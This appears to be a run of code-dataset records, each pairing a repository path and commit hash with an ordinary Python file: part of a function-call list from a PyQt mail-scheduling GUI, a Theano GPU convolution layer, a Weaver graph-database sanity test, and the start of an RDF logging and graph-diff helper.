'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((227, 31, 227, 52), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', ({(227, 43, 227, 51): '"""執行"""'}, {}), "('執行')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((366, 23, 366, 99), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(366, 51, 366, 55): 'self', (366, 57, 366, 71): '"""選取檔案"""', (366, 73, 366, 77): '"""./"""', (366, 79, 366, 98): '"""Eml Files (*.eml)"""'}, {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((370, 23, 370, 102), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(370, 51, 370, 55): 'self', (370, 57, 370, 71): '"""選取檔案"""', (370, 73, 370, 77): '"""./"""', (370, 79, 370, 101): '"""Excel Files (*.xlsx)"""'}, {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((374, 23, 374, 107), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(374, 51, 374, 55): 'self', (374, 57, 374, 71): '"""選取檔案"""', (374, 73, 374, 77): '"""./"""', (374, 79, 374, 106): '"""Word Files (*.doc *.docx)"""'}, {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((378, 23, 378, 113), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(378, 51, 378, 55): 'self', (378, 57, 378, 71): '"""選取檔案"""', (378, 73, 378, 77): '"""./"""', (378, 79, 378, 112): '"""Annex Files (*.jpg *.png *.zip)"""'}, {}), "(self, '選取檔案', './',\n 'Annex Files (*.jpg *.png *.zip)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((441, 23, 441, 99), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', ({(441, 51, 441, 55): 'self', (441, 57, 441, 71): '"""選取檔案"""', (441, 73, 441, 77): '"""./"""', (441, 79, 441, 98): '"""Eml Files (*.eml)"""'}, {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((445, 23, 445, 44), 'mylibrary.genmail.get_msg', 'gm.get_msg', ({(445, 34, 445, 43): 'file_name'}, {}), '(file_name)', True, 'import mylibrary.genmail as gm\n'), ((538, 15, 538, 38), 'PyQt5.QtWidgets.QApplication.instance', 'QApplication.instance', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((32, 27, 32, 61), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ({}, {}), '()', False, 'import qdarkstyle, sys\n'), ((34, 35, 34, 54), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(34, 42, 34, 53): '"""收件人"""'}, {}), "('收件人')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((66, 27, 66, 61), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ({}, {}), '()', False, 'import qdarkstyle, sys\n'), ((156, 42, 156, 69), 'PyQt5.QtCore.QDateTime.currentDateTime', 'QDateTime.currentDateTime', ({}, {}), '()', False, 'from PyQt5.QtCore import Qt, QDateTime\n'), ((288, 25, 288, 38), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(288, 32, 288, 37): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((307, 36, 307, 54), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(307, 43, 307, 53): '"""查詢 :"""'}, {}), "('查詢 :')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((315, 35, 315, 59), 'copy.deepcopy', 'deepcopy', ({(315, 44, 315, 58): 'self.data_logs'}, {}), '(self.data_logs)', False, 'from copy import deepcopy\n'), ((355, 12, 355, 88), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(355, 36, 355, 40): 'self', (355, 42, 355, 52): '"""Success!"""', (355, 54, 355, 71): '"""儲存成功!"""', (355, 73, 355, 87): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((422, 12, 422, 96), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(422, 32, 422, 36): 'self', (422, 38, 422, 47): '"""Failed!"""', (422, 49, 422, 79): '"""請確認有無 SMTP 資料!"""', (422, 81, 422, 95): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((466, 27, 466, 105), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', ({(466, 55, 466, 59): 'self', (466, 61, 466, 75): '"""另存為..."""', (466, 77, 466, 81): '"""./"""', (466, 83, 466, 104): '"""Excel Files (*.eml)"""'}, {}), "(self, '另存為...', './', 'Excel Files (*.eml)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((471, 12, 471, 88), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(471, 36, 471, 40): 'self', (471, 42, 471, 52): '"""Success!"""', (471, 54, 471, 71): '"""儲存成功!"""', (471, 73, 471, 87): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((532, 12, 532, 109), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(532, 32, 532, 36): 'self', (532, 38, 532, 52): '"""缺少資料"""', (532, 54, 532, 92): '"""請確認是否有資料可以下載"""', (532, 94, 532, 108): 'QMessageBox.Ok'}, {}), "(self, '缺少資料', '請確認是否有資料可以下載', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((236, 40, 236, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(236, 47, 236, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((256, 40, 256, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(256, 47, 256, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((273, 40, 273, 53), 'PyQt5.QtWidgets.QLabel', 'QLabel', ({(273, 47, 273, 52): 'label'}, {}), '(label)', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((313, 141, 313, 151), 'server.database.Database', 'Database', ({}, {}), '()', False, 'from server.database import Database\n'), ((337, 12, 337, 92), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(337, 32, 337, 36): 'self', (337, 38, 337, 47): '"""Failed!"""', (337, 49, 337, 75): '"""資料庫連結失敗!"""', (337, 77, 337, 91): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((357, 12, 357, 83), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(357, 32, 357, 36): 'self', (357, 38, 357, 47): '"""Failed!"""', (357, 49, 357, 66): '"""儲存失敗!"""', (357, 68, 357, 82): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((399, 25, 399, 33), 'server.client.Client', 'Client', ({}, {}), '()', False, 'from server.client import Client\n'), ((402, 16, 402, 96), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(402, 40, 402, 44): 'self', (402, 46, 402, 56): '"""Success!"""', (402, 58, 402, 79): '"""排程設定成功!"""', (402, 81, 402, 95): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '排程設定成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((407, 16, 407, 111), 'GenAndSendMail.insert_send_mail', 'insert_send_mail', (), '', False, 'from GenAndSendMail import insert_send_mail\n'), ((412, 16, 412, 96), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(412, 40, 412, 44): 'self', (412, 46, 412, 56): '"""Success!"""', (412, 58, 412, 79): '"""信件寄出成功!"""', (412, 81, 412, 95): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((414, 12, 414, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(414, 32, 414, 36): 'self', (414, 38, 414, 47): '"""Failed!"""', (414, 49, 414, 70): '"""信件寄出失敗!"""', (414, 72, 414, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((437, 12, 437, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(437, 32, 437, 36): 'self', (437, 38, 437, 47): '"""Failed!"""', (437, 49, 437, 70): '"""信件寄出失敗!"""', (437, 72, 437, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((464, 18, 464, 54), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', ({(464, 29, 464, 35): 'header', (464, 37, 464, 41): 'html', (464, 43, 464, 53): 'annex_file'}, {}), '(header, html, annex_file)', True, 'import mylibrary.genmail as gm\n'), ((464, 94, 464, 118), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', ({(464, 105, 464, 111): 'header', (464, 113, 464, 117): 'html'}, {}), '(header, html)', True, 'import mylibrary.genmail as gm\n'), ((468, 22, 468, 50), 'email.generator.Generator', 'generator.Generator', ({(468, 42, 468, 49): 'outfile'}, {}), '(outfile)', False, 'from email import generator\n'), ((473, 12, 473, 83), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(473, 32, 473, 36): 'self', (473, 38, 473, 47): '"""Failed!"""', (473, 49, 473, 66): '"""儲存失敗!"""', (473, 68, 473, 82): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((521, 31, 521, 110), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', ({(521, 59, 521, 63): 'self', (521, 65, 521, 79): '"""另存為..."""', (521, 81, 521, 85): '"""./"""', (521, 87, 521, 109): '"""Excel Files (*.xlsx)"""'}, {}), "(self, '另存為...', './', 'Excel Files (*.xlsx)')", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((525, 21, 525, 51), 'pandas.DataFrame', 'DataFrame', ({(525, 31, 525, 50): 'self.data_temp_logs'}, {}), '(self.data_temp_logs)', False, 'from pandas import DataFrame\n'), ((528, 16, 528, 92), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(528, 40, 528, 44): 'self', (528, 46, 528, 56): '"""Success!"""', (528, 58, 528, 75): '"""儲存成功!"""', (528, 77, 528, 91): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '儲存成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((404, 130, 404, 136), 'server.sendmail.Smtp', 'Smtp', ({}, {}), '()', False, 'from server.sendmail import Smtp\n'), ((405, 141, 405, 151), 'server.database.Database', 'Database', ({}, {}), '()', False, 'from server.database import Database\n'), ((432, 20, 432, 112), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(432, 40, 432, 44): 'self', (432, 46, 432, 56): '"""Warning!"""', (432, 58, 432, 95): "('信件寄出成功!\\nWaning: ' + error)", (432, 97, 432, 111): 'QMessageBox.Ok'}, {}), "(self, 'Warning!', '信件寄出成功!\\nWaning: ' + error,\n QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((434, 20, 434, 100), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', ({(434, 44, 434, 48): 'self', (434, 50, 434, 60): '"""Success!"""', (434, 62, 434, 83): '"""信件寄出成功!"""', (434, 85, 434, 99): 'QMessageBox.Ok'}, {}), "(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((478, 34, 478, 45), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((530, 16, 530, 87), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', ({(530, 36, 530, 40): 'self', (530, 42, 530, 51): '"""Failed!"""', (530, 53, 530, 70): '"""儲存失敗!"""', (530, 72, 530, 86): 'QMessageBox.Ok'}, {}), "(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)", False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((350, 38, 350, 49), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((352, 40, 352, 51), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((515, 46, 515, 67), 'PyQt5.QtGui.QColor', 'QColor', ({(515, 53, 515, 56): '(144)', (515, 58, 515, 61): '(182)', (515, 63, 515, 66): '(240)'}, {}), '(144, 182, 240)', False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n'), ((334, 50, 334, 71), 'PyQt5.QtGui.QColor', 'QColor', ({(334, 57, 334, 60): '(144)', (334, 62, 334, 65): '(182)', (334, 67, 334, 70): '(240)'}, {}), '(144, 182, 240)', False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\n')]
317070/nntools
nntools/layers/corrmm.py
00e2865b1f8246254b3adc22c37989a8b77718d5
""" GpuCorrMM-based convolutional layers """ import numpy as np import theano import theano.tensor as T from theano.sandbox.cuda.basic_ops import gpu_contiguous from theano.sandbox.cuda.blas import GpuCorrMM from .. import init from .. import nonlinearities from . import base # base class for all layers that rely on GpuCorrMM directly class MMLayer(base.Layer): pass class Conv2DMMLayer(MMLayer): def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False, W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None, flip_filters=False): super(Conv2DMMLayer, self).__init__(input_layer) if nonlinearity is None: self.nonlinearity = nonlinearities.identity else: self.nonlinearity = nonlinearity self.num_filters = num_filters self.filter_size = filter_size self.strides = strides self.untie_biases = untie_biases self.flip_filters = flip_filters if border_mode is not None and pad is not None: raise RuntimeError("You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.") elif border_mode is None and pad is None: # no option specified, default to valid mode self.pad = (0, 0) elif border_mode is not None: if border_mode == 'valid': self.pad = (0, 0) elif border_mode == 'full': self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1) elif border_mode == 'same': # only works for odd filter size, but the even filter size case is probably not worth supporting. self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2) else: raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode) else: self.pad = pad self.W = self.create_param(W, self.get_W_shape()) if b is None: self.b = None elif self.untie_biases: output_shape = self.get_output_shape() self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3])) else: self.b = self.create_param(b, (num_filters,)) self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad) def get_W_shape(self): num_input_channels = self.input_layer.get_output_shape()[1] return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1]) def get_params(self): return [self.W] + self.get_bias_params() def get_bias_params(self): return [self.b] if self.b is not None else [] def get_output_shape_for(self, input_shape): batch_size = input_shape[0] input_width, input_height = input_shape[2:4] output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1 output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1 return (batch_size, self.num_filters, output_width, output_height) def get_output_for(self, input, *args, **kwargs): filters = self.W if self.flip_filters: filters = filters[:, :, ::-1, ::-1] # flip width, height contiguous_filters = gpu_contiguous(filters) contiguous_input = gpu_contiguous(input) conved = self.corr_mm_op(contiguous_input, contiguous_filters) if self.b is None: activation = conved elif self.untie_biases: activation = conved + self.b.dimshuffle('x', 0, 1, 2) else: activation = conved + self.b.dimshuffle('x', 0, 'x', 'x') return self.nonlinearity(activation)
[((65, 26, 65, 73), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', (), '', False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((89, 29, 89, 52), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', ({(89, 44, 89, 51): 'filters'}, {}), '(filters)', False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((90, 27, 90, 48), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', ({(90, 42, 90, 47): 'input'}, {}), '(input)', False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')]
dubey/weaver
tests/python/correctness/simple_test_aux_index.py
56a42fd2d0bbb14867ba792ca5461d16310a7387
#! /usr/bin/env python # # =============================================================== # Description: Sanity check for fresh install. # # Created: 2014-08-12 16:42:52 # # Author: Ayush Dubey, [email protected] # # Copyright (C) 2013, Cornell University, see the LICENSE file # for licensing agreement # =============================================================== # import sys try: import weaver.client as client except ImportError: import client config_file='' if len(sys.argv) > 1: config_file = sys.argv[1] # create client object c = client.Client('128.84.167.220', 2002, config_file) # check aux index assert c.aux_index() # 1. create node for user ayush c.begin_tx() c.create_node('ayush') c.set_node_properties({'type': 'user', 'age': '25'}, 'ayush') c.end_tx() # 2. create node for user egs c.begin_tx() c.create_node('egs') c.set_node_property('type', 'user', 'egs') c.end_tx() # 3. ayush follows egs c.begin_tx() c.create_edge('ayush', 'egs', 'e1') c.set_edge_property(edge='e1', key='type', value='follows') c.create_edge('egs', 'ayush', 'e2') c.set_edge_property(edge='e2', key='type', value='followed_by') c.end_tx() # 4. add a post and restrict visibility to followers only c.begin_tx() c.create_node('post') c.set_node_property('type', 'post', 'post') c.set_node_property('visibility', 'followers', 'post') e3 = c.create_edge('egs', 'post') c.set_edge_property(edge=e3, key='type', value='posted') c.end_tx() # 5. 'like' the post c.begin_tx() e4 = c.create_edge('post', 'ayush') c.set_edge_property(edge=e4, key='type', value='liked_by') c.end_tx() # 6. list all the people who like egs's post return_nodes = c.traverse('egs', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute() assert len(return_nodes) == 1, 'traversal returned incorrect #nodes' assert 'ayush' in return_nodes, 'traversal returned bad node handle' # 7. try to create node with same handle as before c.begin_tx() c.create_node('ayush') try: c.end_tx() assert False, 'create node passed' except client.WeaverError: pass # 8. try to create edge with same handle as before c.begin_tx() c.create_edge('ayush', 'egs', 'e1') try: c.end_tx() assert False, 'create edge passed' except client.WeaverError: pass # 9. add auxiliary handles to nodes c.begin_tx() c.add_alias('ad688', 'ayush') c.add_alias('el33th4x0r', 'egs') c.end_tx() # 10. list all the people who like egs's post # this time with aliases instead of handles return_nodes = c.traverse('el33th4x0r', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute() assert len(return_nodes) == 1, 'traversal returned incorrect #nodes' assert 'ayush' in return_nodes, 'traversal returned bad node handle' # 11. get node and check it is valid ad = c.get_node('ayush') assert 'ad688' in ad.aliases assert 'type' in ad.properties assert 'user' in ad.properties['type'] assert 'age' in ad.properties assert '25' in ad.properties['age'] assert 'e1' in ad.out_edges print 'Correctly executed 11 transactions of varying complexity, pass simple_test.' print 'Success, you have a working Weaver setup!'
[]
dmr/Ldtools
ldtools/helpers.py
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
# -*- coding: utf-8 -*- from __future__ import print_function, unicode_literals try: unicode except NameError: basestring = unicode = str # Python 3 import logging import rdflib from rdflib import compare logger = logging.getLogger("ldtools") RESET_SEQ = "\033[0m" COLOR_SEQ = "\033[1;%dm" BOLD_SEQ = "\033[1m" # The background is set with 40 plus the number of the color, and # the foreground with 30 # These are the sequences need to get colored ouput BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) COL = { 'DEBUG': BLUE, 'INFO': MAGENTA, 'WARNING': YELLOW, 'CRITICAL': YELLOW, 'ERROR': RED} def set_colored_logger(verbosity_level): class ColoredFormatter(logging.Formatter): def format(self, record): if record.levelname in COL: record.levelname = COLOR_SEQ % ( 30 + COL[record.levelname]) + record.levelname + RESET_SEQ record.msg = unicode(record.msg) record.msg = COLOR_SEQ % (30 + GREEN) + record.msg + RESET_SEQ return logging.Formatter.format(self, record) formatter = ColoredFormatter("%(asctime)s %(name)s %(funcName)s:%(lineno)d" " %(levelname)s: %(message)s") handler = logging.StreamHandler() handler.setFormatter(formatter) logger = logging.getLogger() logger.addHandler(handler) logger2 = logging.getLogger("ldtools._add_property") logger2.setLevel(logging.INFO) mapper = {1: logging.DEBUG, 2: logging.INFO, 3: logging.WARNING, 4: logging.ERROR, 5: None} try: log_level = mapper[verbosity_level] except KeyError: log_level = mapper[2] if log_level: logger.setLevel(log_level) return logger def my_graph_diff(graph1, graph2): """Compares graph2 to graph1 and highlights everything that changed. Colored if pygments available""" # quick fix for wrong type if not type(graph1) == type(graph2) == rdflib.Graph: if type(graph1) == rdflib.ConjunctiveGraph: g1contexts = list(graph1.contexts()) assert len(g1contexts) == 1 graph1 = g1contexts[0] if type(graph2) == rdflib.ConjunctiveGraph: g2contexts = list(graph2.contexts()) assert len(g2contexts) == 1 graph2 = g2contexts[0] # Return if both graphs are isomorphic iso1 = compare.to_isomorphic(graph1) iso2 = compare.to_isomorphic(graph2) 